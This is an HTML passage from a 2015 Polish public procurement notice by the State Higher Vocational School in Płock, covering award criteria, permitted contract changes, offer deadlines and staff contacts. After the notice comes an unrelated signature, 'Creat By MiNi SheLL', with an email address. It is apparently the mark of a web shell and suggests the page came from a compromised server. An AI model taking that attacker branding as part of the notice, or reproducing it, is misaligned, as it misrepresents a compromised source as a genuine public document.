<li>2 - czas reakci-przystąpienie do usunięcia awarii - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają się zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie:
a)	zmiany postanowień zawartej umowy w sytuacji wystąpienia zjawisk związanych z działaniem siły wyższej (jak np. klęska żywiołowa, niepokoje społeczne, działania militarne, pożar itp.). Zmiana postanowień umowy może dotyczyć m.in. zmiany zakresu przedmiotu umowy, wynagrodzenia, terminu realizacji itp. w takiej sytuacji zmianie ulegnie umowa, w zakresie koniecznym do prawidłowej realizacji umowy i zostanie wprowadzona aneksem,
b)	wynagrodzenia w przypadku ustawowej zmiany wysokości podatku VAT. W powyższym zakresie zostanie podpisany stosowny aneks do umowy ,
c)	w przypadku zmiany danych podmiotowych Wykonawcy (np. w wyniku przekształcenia, przejęcia itp.),</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwszplock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Zawodowa w Płocku, Pl. Dąbrowskiego 2, pok. B 116.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2015 godzina 08:45, miejsce: Państwowa Wyższa Szkoła Zawodowa w Płocku, Pl. Dąbrowskiego 2, Sekretariat Kanclerza i Kwestora, pok. B 202.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do porozumiewania się z Wykonawcami są:
a)	w zakresie opisu przedmiotu zamówienia - Grzegorz Wichrowski -, tel. 24/366-54-00 wew. 221  w godz. pracy Uczelni,
b)	w zakresie proceduralnym i formalnym - Magdalena Kalota - Sekcja Zamówień Publicznych i Umów, tel. 24/366-54-00 wew. 240 w godz. pracy Uczelni..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com